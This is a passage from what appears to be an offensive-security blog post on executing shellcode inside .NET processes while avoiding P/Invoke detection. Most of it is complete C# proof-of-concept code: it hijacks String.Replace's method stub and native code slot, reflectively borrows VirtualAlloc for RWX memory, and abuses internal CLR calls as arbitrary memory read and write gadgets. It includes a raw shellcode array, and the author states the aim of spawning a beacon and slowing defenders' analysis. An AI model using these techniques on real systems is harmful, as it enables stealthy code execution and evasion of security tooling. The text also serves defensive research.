            Marshal.Copy(jmpCode, 0, stub, jmpCode.Length);
            Marshal.WriteIntPtr(stub + 2, mem);
            // FIRE!!
            "ANYSTRING".Replace("XPN", "WAZ'ERE", true, null);
        }
    }
    public static class Internals
    {
        [StructLayout(LayoutKind.Explicit)]
        public struct MethodTable
        {
            [FieldOffset(0)]
            public uint m_dwFlags;
            [FieldOffset(0x4)]
            public uint m_BaseSize;
            [FieldOffset(0x8)]
            public ushort m_wFlags2;
            [FieldOffset(0x0a)]
            public ushort m_wToken;
            [FieldOffset(0x0c)]
            public ushort m_wNumVirtuals;
            [FieldOffset(0x0e)]
            public ushort m_wNumInterfaces;
            [FieldOffset(0x10)]
            public IntPtr m_pParentMethodTable;
            [FieldOffset(0x18)]
            public IntPtr m_pLoaderModule;
            [FieldOffset(0x20)]
            public IntPtr m_pWriteableData;
            [FieldOffset(0x28)]
            public IntPtr m_pEEClass;
            [FieldOffset(0x30)]
            public IntPtr m_pPerInstInfo;
            [FieldOffset(0x38)]
            public IntPtr m_pInterfaceMap;
        }
        [StructLayout(LayoutKind.Explicit)]
        public struct EEClass
        {
            [FieldOffset(0)]
            public IntPtr m_pGuidInfo;
            [FieldOffset(0x8)]
            public IntPtr m_rpOptionalFields;
            [FieldOffset(0x10)]
            public IntPtr m_pMethodTable;
            [FieldOffset(0x18)]
            public IntPtr m_pFieldDescList;
            [FieldOffset(0x20)]
            public IntPtr m_pChunks;
        }
        [StructLayout(LayoutKind.Explicit)]
        public struct MethodDescChunk
        {
            [FieldOffset(0)]
            public IntPtr m_methodTable;
            [FieldOffset(8)]
            public IntPtr m_next;
            [FieldOffset(0x10)]
            public byte m_size;
            [FieldOffset(0x11)]
            public byte m_count;
            [FieldOffset(0x12)]
            public byte m_flagsAndTokenRange;
        }
        [StructLayout(LayoutKind.Explicit)]
        public struct MethodDesc
        {
            [FieldOffset(0)]
            public ushort m_wFlags3AndTokenRemainder;
            [FieldOffset(2)]
            public byte m_chunkIndex;
            [FieldOffset(0x3)]
            public byte m_bFlags2;
            [FieldOffset(0x4)]
            public ushort m_wSlotNumber;
            [FieldOffset(0x6)]
            public ushort m_wFlags;
            [FieldOffset(0x8)]
            public IntPtr TempEntry;
        }
        public const int mdcHasNonVtableSlot = 0x0008;
        [Flags]
        public enum AllocationType
        {
            Commit = 0x1000,
            Reserve = 0x2000,
            Decommit = 0x4000,
            Release = 0x8000,
            Reset = 0x80000,
            Physical = 0x400000,
            TopDown = 0x100000,
            WriteWatch = 0x200000,
            LargePages = 0x20000000
        }
        [Flags]
        public enum MemoryProtection
        {
            Execute = 0x10,
            ExecuteRead = 0x20,
            ExecuteReadWrite = 0x40,
            ExecuteWriteCopy = 0x80,
            NoAccess = 0x01,
            ReadOnly = 0x02,
            ReadWrite = 0x04,
            WriteCopy = 0x08,
            GuardModifierflag = 0x100,
            NoCacheModifierflag = 0x200,
            WriteCombineModifierflag = 0x400
        }
        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        public static extern IntPtr VirtualAlloc(IntPtr lpAddress, int dwSize, AllocationType flAllocationType, MemoryProtection flProtect);
    }
}
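
The 12-byte jump stub used in the listing above starts with a placeholder address (0x4141414141414141) that is patched at offset 2. The Python sketch below builds the same byte sequence directly from a target address. The helper name and the sample address are illustrative only.

```python
import struct


def build_jmp_stub(target):
    """Encode `mov rax, target` (48 B8 imm64) followed by `jmp rax` (FF E0)."""
    return b"\x48\xB8" + struct.pack("<Q", target) + b"\xFF\xE0"


# Made-up target address standing in for the allocated shellcode buffer.
stub = build_jmp_stub(0x00007FF612340000)
```

The immediate occupies bytes 2 through 9, which is why the C# code writes the pointer at stub + 2.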


Once executed, if everything goes well, we end up with our beacon spawning from within .NET:

Now I know what you’re thinking… what about that VirtualAlloc call that we made there… wasn’t that a P/Invoke that we were trying to avoid? Well, yes smarty pants! This was a P/Invoke, however in keeping with our exploration of weird ways to invoke .NET, there is nothing stopping us from stealing an existing P/Invoke from the .NET framework. For example, if we look within the Interop.Kernel32 class, we’ll see a list of P/Invoke methods, including… VirtualAlloc:

So, what about if we just borrow that VirtualAlloc method for our evil bidding? Then we don’t have to P/Invoke directly from our code:

var kernel32 = typeof(System.String).Assembly.GetType("Interop+Kernel32");
var VirtualAlloc = kernel32.GetMethod("VirtualAlloc", System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
var ptr = VirtualAlloc.Invoke(null, new object[] { IntPtr.Zero, new UIntPtr((uint)shellcode.Length), 0x3000, 0x40 });
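
The two magic numbers passed in that call are the same values as the AllocationType and MemoryProtection enum members used in the other listings in this post. A short Python check, written only to make the bit arithmetic visible:

```python
from enum import IntFlag


class AllocationType(IntFlag):
    COMMIT = 0x1000
    RESERVE = 0x2000


class MemoryProtection(IntFlag):
    EXECUTE_READWRITE = 0x40


# Commit | Reserve and ExecuteReadWrite, as named in the C# enums in this post
alloc_type = AllocationType.COMMIT | AllocationType.RESERVE
protect = MemoryProtection.EXECUTE_READWRITE
```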

Now unfortunately the Interop.Kernel32.VirtualAlloc P/Invoke method returns a void*, which means that we receive a System.Reflection.Pointer type. This normally requires an unsafe method to play around with, which for the purposes of this post I’m trying to avoid. So let’s try and convert that into an IntPtr using the internal GetPointerValue method:

IntPtr alloc = (IntPtr)ptr.GetType().GetMethod("GetPointerValue", BindingFlags.NonPublic | BindingFlags.Instance).Invoke(ptr, new object[] { });

And there we have allocated RWX memory without having to directly reference any P/Invoke methods. Combined with our execution example, we end up with a POC like this:

using System;
using System.Reflection;
using System.Runtime.InteropServices;
namespace NautilusProject
{
    public class ExecStubOverwriteWithoutPInvoke
    {
        public static void Execute(byte[] shellcode)
        {
            // mov rax, 0x4141414141414141
            // jmp rax
            var jmpCode = new byte[] { 0x48, 0xB8, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0xFF, 0xE0 };
            var t = typeof(System.String);
            var mt = Marshal.PtrToStructure<Internals.MethodTable>(t.TypeHandle.Value);
            var ec = Marshal.PtrToStructure<Internals.EEClass>(mt.m_pEEClass);
            var mdc = Marshal.PtrToStructure<Internals.MethodDescChunk>(ec.m_pChunks);
            var md = Marshal.PtrToStructure<Internals.MethodDesc>(ec.m_pChunks + 0x18);
            if ((md.m_wFlags & Internals.mdcHasNonVtableSlot) != Internals.mdcHasNonVtableSlot)
            {
                Console.WriteLine("[x] Error: mdcHasNonVtableSlot not set for this MethodDesc");
                return;
            }
            // Get the String.Replace method stub
            IntPtr stub = Marshal.ReadIntPtr(ec.m_pChunks + 0x18 + 8);
            // Nick p/invoke from CoreCLR Interop.Kernel32.VirtualAlloc
            var kernel32 = typeof(System.String).Assembly.GetType("Interop+Kernel32");
            var VirtualAlloc = kernel32.GetMethod("VirtualAlloc", System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
            // Allocate memory
            var ptr = VirtualAlloc.Invoke(null, new object[] { IntPtr.Zero, new UIntPtr((uint)shellcode.Length), Internals.AllocationType.Commit | Internals.AllocationType.Reserve, Internals.MemoryProtection.ExecuteReadWrite });
            // Convert void* to IntPtr
            IntPtr mem = (IntPtr)ptr.GetType().GetMethod("GetPointerValue", BindingFlags.NonPublic | BindingFlags.Instance).Invoke(ptr, new object[] { });
            Marshal.Copy(shellcode, 0, mem, shellcode.Length);
            // Point the stub to our shellcode
            Marshal.Copy(jmpCode, 0, stub, jmpCode.Length);
            Marshal.WriteIntPtr(stub + 2, mem);
            // FIRE!!
            "ANYSTRING".Replace("XPN", "WAZ'ERE", true, null);
        }
        public static class Internals
        {
            [StructLayout(LayoutKind.Explicit)]
            public struct MethodTable
            {
                [FieldOffset(0)]
                public uint m_dwFlags;
                [FieldOffset(0x4)]
                public uint m_BaseSize;
                [FieldOffset(0x8)]
                public ushort m_wFlags2;
                [FieldOffset(0x0a)]
                public ushort m_wToken;
                [FieldOffset(0x0c)]
                public ushort m_wNumVirtuals;
                [FieldOffset(0x0e)]
                public ushort m_wNumInterfaces;
                [FieldOffset(0x10)]
                public IntPtr m_pParentMethodTable;
                [FieldOffset(0x18)]
                public IntPtr m_pLoaderModule;
                [FieldOffset(0x20)]
                public IntPtr m_pWriteableData;
                [FieldOffset(0x28)]
                public IntPtr m_pEEClass;
                [FieldOffset(0x30)]
                public IntPtr m_pPerInstInfo;
                [FieldOffset(0x38)]
                public IntPtr m_pInterfaceMap;
            }
            [StructLayout(LayoutKind.Explicit)]
            public struct EEClass
            {
                [FieldOffset(0)]
                public IntPtr m_pGuidInfo;
                [FieldOffset(0x8)]
                public IntPtr m_rpOptionalFields;
                [FieldOffset(0x10)]
                public IntPtr m_pMethodTable;
                [FieldOffset(0x18)]
                public IntPtr m_pFieldDescList;
                [FieldOffset(0x20)]
                public IntPtr m_pChunks;
            }
            [StructLayout(LayoutKind.Explicit)]
            public struct MethodDescChunk
            {
                [FieldOffset(0)]
                public IntPtr m_methodTable;
                [FieldOffset(8)]
                public IntPtr m_next;
                [FieldOffset(0x10)]
                public byte m_size;
                [FieldOffset(0x11)]
                public byte m_count;
                [FieldOffset(0x12)]
                public byte m_flagsAndTokenRange;
            }
            [StructLayout(LayoutKind.Explicit)]
            public struct MethodDesc
            {
                [FieldOffset(0)]
                public ushort m_wFlags3AndTokenRemainder;
                [FieldOffset(2)]
                public byte m_chunkIndex;
                [FieldOffset(0x3)]
                public byte m_bFlags2;
                [FieldOffset(0x4)]
                public ushort m_wSlotNumber;
                [FieldOffset(0x6)]
                public ushort m_wFlags;
                [FieldOffset(0x8)]
                public IntPtr TempEntry;
            }
            public const int mdcHasNonVtableSlot = 0x0008;
            [Flags]
            public enum AllocationType
            {
                Commit = 0x1000,
                Reserve = 0x2000,
                Decommit = 0x4000,
                Release = 0x8000,
                Reset = 0x80000,
                Physical = 0x400000,
                TopDown = 0x100000,
                WriteWatch = 0x200000,
                LargePages = 0x20000000
            }
            [Flags]
            public enum MemoryProtection
            {
                Execute = 0x10,
                ExecuteRead = 0x20,
                ExecuteReadWrite = 0x40,
                ExecuteWriteCopy = 0x80,
                NoAccess = 0x01,
                ReadOnly = 0x02,
                ReadWrite = 0x04,
                WriteCopy = 0x08,
                GuardModifierflag = 0x100,
                NoCacheModifierflag = 0x200,
                WriteCombineModifierflag = 0x400
            }
        }
    }
}


And when executed, we get a nice beacon:

Now this is nice, but what about if we want to run unmanaged code and then resume executing further .NET code afterwards? Well we can do this in a few ways, but let’s have a look at what happens to our MethodDesc after the JIT process has completed. If we take a memory dump of the String.Replace MethodDesc before we have it JIT’d:

And then we look again after, we will see an address being populated:

And if we dump the memory from this address:

What you are seeing here is called a “Native Code Slot”, which is a pointer to the compiled method’s native code once the JIT process has completed. Now this field is not guaranteed to be present, and we can tell if the MethodDesc provides a location for a Native Code Slot by again looking at the m_wFlags property:

The flag that we are looking to be set is mdcHasNativeCodeSlot:

If this flag is present, we can simply force JIT compilation and update the Native Code Slot, pointing it to our desired unmanaged code, meaning further execution of the .NET method will trigger our payload. Once executed, we can then jump back to the actual JIT’d native code to ensure that the original .NET code is executed. The code to do this looks like this:

using System;
using System.Reflection;
using System.Runtime.InteropServices;
namespace NautilusProject
{
    public class ExecNativeSlot
    {
        public static void Execute()
        {
            // WinExec of calc.exe, jmps to address set in last 8 bytes
            var shellcode = new byte[]
            {
                0x55, 0x48, 0x89, 0xe5, 0x9c, 0x53, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51,
                0x41, 0x52, 0x41, 0x53, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57,
                0x56, 0x57, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x60, 0x00, 0x00, 0x00, 0x48,
                0x8b, 0x40, 0x18, 0x48, 0x8b, 0x70, 0x10, 0x48, 0xad, 0x48, 0x8b, 0x30,
                0x48, 0x8b, 0x7e, 0x30, 0x8b, 0x5f, 0x3c, 0x48, 0x01, 0xfb, 0xba, 0x88,
                0x00, 0x00, 0x00, 0x8b, 0x1c, 0x13, 0x48, 0x01, 0xfb, 0x8b, 0x43, 0x20,
                0x48, 0x01, 0xf8, 0x48, 0x89, 0xc6, 0x48, 0x31, 0xc9, 0xad, 0x48, 0x01,
                0xf8, 0x81, 0x38, 0x57, 0x69, 0x6e, 0x45, 0x74, 0x05, 0x48, 0xff, 0xc1,
                0xeb, 0xef, 0x8b, 0x43, 0x1c, 0x48, 0x01, 0xf8, 0x8b, 0x04, 0x88, 0x48,
                0x01, 0xf8, 0xba, 0x05, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0d, 0x25, 0x00,
                0x00, 0x00, 0xff, 0xd0, 0x5f, 0x5e, 0x41, 0x5f, 0x41, 0x5e, 0x41, 0x5d,
                0x41, 0x5c, 0x41, 0x5b, 0x41, 0x5a, 0x41, 0x59, 0x41, 0x58, 0x5a, 0x59,
                0x5b, 0x9d, 0x48, 0x89, 0xec, 0x5d, 0x48, 0x8b, 0x05, 0x0b, 0x00, 0x00,
                0x00, 0xff, 0xe0, 0x63, 0x61, 0x6c, 0x63, 0x2e, 0x65, 0x78, 0x65, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
            };
            var t = typeof(System.String);
            var mt = Marshal.PtrToStructure<Internals.MethodTable>(t.TypeHandle.Value);
            var ec = Marshal.PtrToStructure<Internals.EEClass>(mt.m_pEEClass);
            var mdc = Marshal.PtrToStructure<Internals.MethodDescChunk>(ec.m_pChunks);
            var md = Marshal.PtrToStructure<Internals.MethodDesc>(ec.m_pChunks + 0x18);
            if ((md.m_wFlags & Internals.mdcHasNonVtableSlot) != Internals.mdcHasNonVtableSlot)
            {
                Console.WriteLine("[x] Error: mdcHasNonVtableSlot not set for this MethodDesc");
                return;
            }
            if ((md.m_wFlags & Internals.mdcHasNativeCodeSlot) != Internals.mdcHasNativeCodeSlot)
            {
                Console.WriteLine("[x] Error: mdcHasNativeCodeSlot not set for this MethodDesc");
                return;
            }
            // Trigger Jit of String.Replace method
            "ANYSTRING".Replace("XPN", "WAZ'ERE", true, null);
            // Get the String.Replace method native code pointer
            IntPtr nativeCodePointer = Marshal.ReadIntPtr(ec.m_pChunks + 0x18 + 0x10);
            // Steal p/invoke from CoreCLR Interop.Kernel32.VirtualAlloc
            var kernel32 = typeof(System.String).Assembly.GetType("Interop+Kernel32");
            var VirtualAlloc = kernel32.GetMethod("VirtualAlloc", System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
            // Allocate memory
            var ptr = VirtualAlloc.Invoke(null, new object[] { IntPtr.Zero, new UIntPtr((uint)shellcode.Length), Internals.AllocationType.Commit | Internals.AllocationType.Reserve, Internals.MemoryProtection.ExecuteReadWrite });
            // Convert void* to IntPtr
            IntPtr mem = (IntPtr)ptr.GetType().GetMethod("GetPointerValue", BindingFlags.NonPublic | BindingFlags.Instance).Invoke(ptr, new object[] { });
            Marshal.Copy(shellcode, 0, mem, shellcode.Length);
            // Take the original address
            var orig = Marshal.ReadIntPtr(ec.m_pChunks + 0x18 + 0x10);
            // Point the native code pointer to our shellcode directly
            Marshal.WriteIntPtr(ec.m_pChunks + 0x18 + 0x10, mem);
            // Set original address
            Marshal.WriteIntPtr(mem + shellcode.Length - 8, orig);
            // Charging Ma Laz0r...
            System.Threading.Thread.Sleep(1000);
            // FIRE!!
            "ANYSTRING".Replace("XPN", "WAZ'ERE", true, null);
            // Restore previous native address now that we're done
            Marshal.WriteIntPtr(ec.m_pChunks + 0x18 + 0x10, orig);
        }
        public static class Internals
        {
            [StructLayout(LayoutKind.Explicit)]
            public struct MethodTable
            {
                [FieldOffset(0)]
                public uint m_dwFlags;
                [FieldOffset(0x4)]
                public uint m_BaseSize;
                [FieldOffset(0x8)]
                public ushort m_wFlags2;
                [FieldOffset(0x0a)]
                public ushort m_wToken;
                [FieldOffset(0x0c)]
                public ushort m_wNumVirtuals;
                [FieldOffset(0x0e)]
                public ushort m_wNumInterfaces;
                [FieldOffset(0x10)]
                public IntPtr m_pParentMethodTable;
                [FieldOffset(0x18)]
                public IntPtr m_pLoaderModule;
                [FieldOffset(0x20)]
                public IntPtr m_pWriteableData;
                [FieldOffset(0x28)]
                public IntPtr m_pEEClass;
                [FieldOffset(0x30)]
                public IntPtr m_pPerInstInfo;
                [FieldOffset(0x38)]
                public IntPtr m_pInterfaceMap;
            }
            [StructLayout(LayoutKind.Explicit)]
            public struct EEClass
            {
                [FieldOffset(0)]
                public IntPtr m_pGuidInfo;
                [FieldOffset(0x8)]
                public IntPtr m_rpOptionalFields;
                [FieldOffset(0x10)]
                public IntPtr m_pMethodTable;
                [FieldOffset(0x18)]
                public IntPtr m_pFieldDescList;
                [FieldOffset(0x20)]
                public IntPtr m_pChunks;
            }
            [StructLayout(LayoutKind.Explicit)]
            public struct MethodDescChunk
            {
                [FieldOffset(0)]
                public IntPtr m_methodTable;
                [FieldOffset(8)]
                public IntPtr m_next;
                [FieldOffset(0x10)]
                public byte m_size;
                [FieldOffset(0x11)]
                public byte m_count;
                [FieldOffset(0x12)]
                public byte m_flagsAndTokenRange;
            }
            [StructLayout(LayoutKind.Explicit)]
            public struct MethodDesc
            {
                [FieldOffset(0)]
                public ushort m_wFlags3AndTokenRemainder;
                [FieldOffset(2)]
                public byte m_chunkIndex;
                [FieldOffset(0x3)]
                public byte m_bFlags2;
                [FieldOffset(0x4)]
                public ushort m_wSlotNumber;
                [FieldOffset(0x6)]
                public ushort m_wFlags;
                [FieldOffset(0x8)]
                public IntPtr TempEntry;
            }
            public const int mdcHasNonVtableSlot = 0x0008;
            public const int mdcHasNativeCodeSlot = 0x0020;
            [Flags]
            public enum AllocationType
            {
                Commit = 0x1000,
                Reserve = 0x2000,
                Decommit = 0x4000,
                Release = 0x8000,
                Reset = 0x80000,
                Physical = 0x400000,
                TopDown = 0x100000,
                WriteWatch = 0x200000,
                LargePages = 0x20000000
            }
            [Flags]
            public enum MemoryProtection
            {
                Execute = 0x10,
                ExecuteRead = 0x20,
                ExecuteReadWrite = 0x40,
                ExecuteWriteCopy = 0x80,
                NoAccess = 0x01,
                ReadOnly = 0x02,
                ReadWrite = 0x04,
                WriteCopy = 0x08,
                GuardModifierflag = 0x100,
                NoCacheModifierflag = 0x200,
                WriteCombineModifierflag = 0x400
            }
        }
    }
}

And when run, we see that we can resume .NET execution after our unmanaged code has finished executing:
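
The explicit-layout structs in the listing pin each CLR field to a fixed byte offset. As a rough illustration of what those offsets mean, the following Python sketch decodes a few MethodTable fields from a raw buffer. The buffer contents and the example pointer value are invented for the demonstration, and the offsets are copied from the listing, which assumes a 64-bit process; they may not hold across runtime versions.

```python
import struct

# Offsets copied from the MethodTable struct in the listing (64-bit layout).
METHOD_TABLE_FIELDS = {
    "m_dwFlags": (0x00, "<I"),
    "m_BaseSize": (0x04, "<I"),
    "m_wNumVirtuals": (0x0C, "<H"),
    "m_pParentMethodTable": (0x10, "<Q"),
    "m_pEEClass": (0x28, "<Q"),
}


def parse_method_table(raw: bytes) -> dict:
    """Decode selected MethodTable fields from a little-endian byte buffer."""
    return {
        name: struct.unpack_from(fmt, raw, offset)[0]
        for name, (offset, fmt) in METHOD_TABLE_FIELDS.items()
    }


# Build a fake 0x40-byte MethodTable purely for demonstration.
fake = bytearray(0x40)
struct.pack_into("<I", fake, 0x04, 24)               # m_BaseSize (made-up value)
struct.pack_into("<Q", fake, 0x28, 0x7FFA12345678)   # m_pEEClass (made-up pointer)

fields = parse_method_table(bytes(fake))
print(hex(fields["m_pEEClass"]))
```

Reading `m_pEEClass` at offset 0x28 and then `m_pChunks` at offset 0x20 of the EEClass is the same pointer walk the C# code performs with `Marshal.ReadIntPtr`.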

So, what else can we find in the .NET runtime, are there any other quirks we can use to transition between managed and unmanaged code?

InternalCall and QCall

If you’ve spent much time disassembling the .NET runtime, you will have come across methods annotated with attributes such as [MethodImpl(MethodImplOptions.InternalCall)]:

In other areas, you will see references to a DllImport to a strangely named QCall DLL:

Both are examples of code that transfers execution into the CLR. Inside the CLR they are referred to as an “FCall” and a “QCall” respectively. The reasons that these calls exist are varied, but essentially when the .NET framework can’t do something from within managed code, an FCall or QCall is used to request that native code perform the function before returning to .NET.

One good example of this in action is something that we’ve already encountered, Marshal.GetDelegateForFunctionPointer. If we disassemble the System.Private.CoreLib DLL we see that this is ultimately marked as an FCall:

Let’s follow this path further into the CLR source code and see where the call ends up. The file that we need to look at is ecalllist.h, which describes the FCall and QCall methods implemented within the CLR, including our GetDelegateForFunctionPointerInternal call:

If we jump over to the native method MarshalNative::GetDelegateForFunctionPointerInternal, we can actually see the native code used when this method is called:

Now… wouldn’t it be cool if we could find some of these FCall and QCall gadgets which would allow us to play around with unmanaged memory? After all, forcing defenders to transition from disassembling .NET code to reviewing the CLR source certainly would slow down static analysis… hopefully increasing that WTF!! factor during analysis. Let’s start by hunting for a set of memory read and write gadgets which, as we now know from above, will lead to code execution.

The first .NET method we will look at is System.StubHelpers.StubHelpers.GetNDirectTarget, which is an internal static method:

Again we can trace this code into the CLR and see what is happening:

OK, so this looks good. Here we have an IntPtr being passed from managed to unmanaged code without any kind of validation that the pointer we are passing is in fact an NDirectMethodDesc object pointer. So what does that pNMD->GetNDirectTarget() call do?

So here we have a method returning a member variable from an object we control. A review shows us that we can use this to return arbitrary memory of IntPtr.Size bytes in length. How can we do this? Well let’s return to .NET and try the following code:

using System;
using System.Reflection;
using System.Runtime.InteropServices;
namespace NautilusProject
{
public class ReadGadget
{
public static IntPtr ReadMemory(IntPtr addr)
{
var stubHelper = typeof(System.String).Assembly.GetType("System.StubHelpers.StubHelpers");
var GetNDirectTarget = stubHelper.GetMethod("GetNDirectTarget", System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
// Spray away
IntPtr unmanagedPtr = Marshal.AllocHGlobal(200);
for (int i = 0; i < 200; i += IntPtr.Size)
{
Marshal.Copy(new[] { addr }, 0, unmanagedPtr + i, 1);
}
return (IntPtr)GetNDirectTarget.Invoke(null, new object[] { unmanagedPtr });
}
}
}

And if we run this:

Awesome, so we have our first example of a gadget which can be useful to interact with unmanaged memory. Next, we should think about how to write memory. Again if we review potential FCalls and QCalls it doesn’t take long to stumble over several candidates, including System.StubHelpers.MngdRefCustomMarshaler.CreateMarshaler:

Following the execution path we find that this results in the execution of the method MngdRefCustomMarshaler::CreateMarshaler:

And again, if we look at what this method does within native code:

Checking on MngdRefCustomMarshaler, we find that m_pCMHelper is the only member variable present in the class:

So, this one is easy, we can write 8 bytes to any memory location as we control both pThis and pCMHelper. The code to do this looks something like this:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace NautilusProject
{
public class WriteGadget
{
public static void WriteMemory(IntPtr addr, IntPtr value)
{
var mngdRefCustomeMarshaller = typeof(System.String).Assembly.GetType("System.StubHelpers.MngdRefCustomMarshaler");
var CreateMarshaler = mngdRefCustomeMarshaller.GetMethod("CreateMarshaler", System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
CreateMarshaler.Invoke(null, new object[] { addr, value });
}
}
}
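
To make the two primitives easier to reason about, here is a toy Python model of what the native side appears to do. It is only a sketch under stated assumptions: the read gadget is assumed to follow one pointer stored inside the object it is handed and return the pointer-sized value behind it, and the write gadget is assumed to store its second argument at offset 0 of its first. `ToyMemory`, `WRITEABLE_DATA_OFFSET` and the addresses are hypothetical; the real member offset is not stated in the text, which is presumably why the C# code sprays the address across the whole buffer.

```python
import struct

PTR = 8  # pointer size, assuming a 64-bit process


class ToyMemory:
    """A flat little-endian address space used only for illustration."""

    def __init__(self, size: int):
        self.data = bytearray(size)

    def read_ptr(self, addr: int) -> int:
        return struct.unpack_from("<Q", self.data, addr)[0]

    def write_ptr(self, addr: int, value: int) -> None:
        struct.pack_into("<Q", self.data, addr, value)


# Hypothetical offset of the pointer member inside the fake object.
WRITEABLE_DATA_OFFSET = 0x30


def native_get_ndirect_target(mem: ToyMemory, p_nmd: int) -> int:
    """Model of the getter: follow a pointer member, return what it points to."""
    writeable = mem.read_ptr(p_nmd + WRITEABLE_DATA_OFFSET)
    return mem.read_ptr(writeable)


def native_create_marshaler(mem: ToyMemory, p_this: int, p_cm_helper: int) -> None:
    """Model of pThis->m_pCMHelper = pCMHelper with the member at offset 0."""
    mem.write_ptr(p_this, p_cm_helper)


def read_memory(mem: ToyMemory, addr: int, scratch: int = 0x100) -> int:
    # Spray the target address over a 200-byte fake object, so the getter
    # finds it whichever pointer-aligned offset the member really lives at.
    for i in range(0, 200, PTR):
        mem.write_ptr(scratch + i, addr)
    return native_get_ndirect_target(mem, scratch)


def write_memory(mem: ToyMemory, addr: int, value: int) -> None:
    native_create_marshaler(mem, addr, value)


mem = ToyMemory(0x1000)
write_memory(mem, 0x800, 0xDEADBEEF)
print(hex(read_memory(mem, 0x800)))
```

The point of the model is that neither native routine validates the pointer it receives, so the caller decides which address is dereferenced.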

Let’s have some fun and use this gadget to modify the length of a System.String object to show the control we have to modify arbitrary memory bytes:

OK, so now we have our 2 (of MANY possible) gadgets, what would it look like if we transplanted this into our code execution example? Well, we end up with something pretty weird:

using System;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Linq;
namespace NautilusProject
{
internal class CombinedExec
{
public static IntPtr AllocMemory(int length)
{
var kernel32 = typeof(System.String).Assembly.GetType("Interop+Kernel32");
var VirtualAlloc = kernel32.GetMethod("VirtualAlloc", System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
var ptr = VirtualAlloc.Invoke(null, new object[] { IntPtr.Zero, new UIntPtr((uint)length), Internals.AllocationType.Commit | Internals.AllocationType.Reserve, Internals.MemoryProtection.ExecuteReadWrite });
IntPtr mem = (IntPtr)ptr.GetType().GetMethod("GetPointerValue", BindingFlags.NonPublic | BindingFlags.Instance).Invoke(ptr, new object[] { });
return mem;
}
public static void WriteMemory(IntPtr addr, IntPtr value)
{
var mngdRefCustomeMarshaller = typeof(System.String).Assembly.GetType("System.StubHelpers.MngdRefCustomMarshaler");
var CreateMarshaler = mngdRefCustomeMarshaller.GetMethod("CreateMarshaler", System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
CreateMarshaler.Invoke(null, new object[] { addr, value });
}
public static IntPtr ReadMemory(IntPtr addr)
{
var stubHelper = typeof(System.String).Assembly.GetType("System.StubHelpers.StubHelpers");
var GetNDirectTarget = stubHelper.GetMethod("GetNDirectTarget", System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
IntPtr unmanagedPtr = Marshal.AllocHGlobal(200);
for (int i = 0; i < 200; i += IntPtr.Size)
{
Marshal.Copy(new[] { addr }, 0, unmanagedPtr + i, 1);
}
return (IntPtr)GetNDirectTarget.Invoke(null, new object[] { unmanagedPtr });
}
public static void CopyMemory(byte[] source, IntPtr dest)
{
// Pad to IntPtr length
if ((source.Length % IntPtr.Size) != 0)
{
// Append only the bytes needed to reach the next multiple of IntPtr.Size
source = source.Concat<byte>(new byte[IntPtr.Size - (source.Length % IntPtr.Size)]).ToArray();
}
GCHandle pinnedArray = GCHandle.Alloc(source, GCHandleType.Pinned);
IntPtr sourcePtr = pinnedArray.AddrOfPinnedObject();
for (int i = 0; i < source.Length; i += IntPtr.Size)
{
WriteMemory(dest + i, ReadMemory(sourcePtr + i));
}
}
public static void Execute(byte[] shellcode)
{
// mov rax, 0x4141414141414141
// jmp rax
var jmpCode = new byte[] { 0x48, 0xB8, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0xFF, 0xE0 };
var t = typeof(System.String);
var ecBase = ReadMemory(t.TypeHandle.Value + 0x28);
var mdcBase = ReadMemory(ecBase + 0x20);
IntPtr stub = ReadMemory(mdcBase + 0x18 + 8);
var kernel32 = typeof(System.String).Assembly.GetType("Interop+Kernel32");
var VirtualAlloc = kernel32.GetMethod("VirtualAlloc", System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
var ptr = VirtualAlloc.Invoke(null, new object[] { IntPtr.Zero, new UIntPtr((uint)shellcode.Length), Internals.AllocationType.Commit | Internals.AllocationType.Reserve, Internals.MemoryProtection.ExecuteReadWrite });
IntPtr mem = (IntPtr)ptr.GetType().GetMethod("GetPointerValue", BindingFlags.NonPublic | BindingFlags.Instance).Invoke(ptr, new object[] { });
CopyMemory(shellcode, mem);
CopyMemory(jmpCode, stub);
WriteMemory(stub + 2, mem);
"ANYSTRING".Replace("XPN", "WAZ'ERE", true, null);
}
public static class Internals
{
[Flags]
public enum AllocationType
{
Commit = 0x1000,
Reserve = 0x2000,
Decommit = 0x4000,
Release = 0x8000,
Reset = 0x80000,
Physical = 0x400000,
TopDown = 0x100000,
WriteWatch = 0x200000,
LargePages = 0x20000000
}
[Flags]
public enum MemoryProtection
{
Execute = 0x10,
ExecuteRead = 0x20,
ExecuteReadWrite = 0x40,
ExecuteWriteCopy = 0x80,
NoAccess = 0x01,
ReadOnly = 0x02,
ReadWrite = 0x04,
WriteCopy = 0x08,
GuardModifierflag = 0x100,
NoCacheModifierflag = 0x200,
WriteCombineModifierflag = 0x400
}
}
}
}

And of course, if we execute this, we end up with our desired result of unmanaged code execution:
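
Two details of the listing are easy to get wrong: the encoding of the `mov rax, imm64; jmp rax` stub, and the padding needed before a buffer can be copied one pointer-sized word at a time. The Python sketch below works through both. The helper names are hypothetical and a 64-bit pointer size is assumed; it only builds and splits bytes and does not touch process memory.

```python
import struct

PTR_SIZE = 8  # assumes a 64-bit process


def build_jmp_stub(target: int) -> bytes:
    """Encode `mov rax, imm64; jmp rax` with the given absolute target."""
    return b"\x48\xB8" + struct.pack("<Q", target) + b"\xFF\xE0"


def pad_to_pointer_size(data: bytes) -> bytes:
    """Zero-pad so the length becomes a multiple of PTR_SIZE."""
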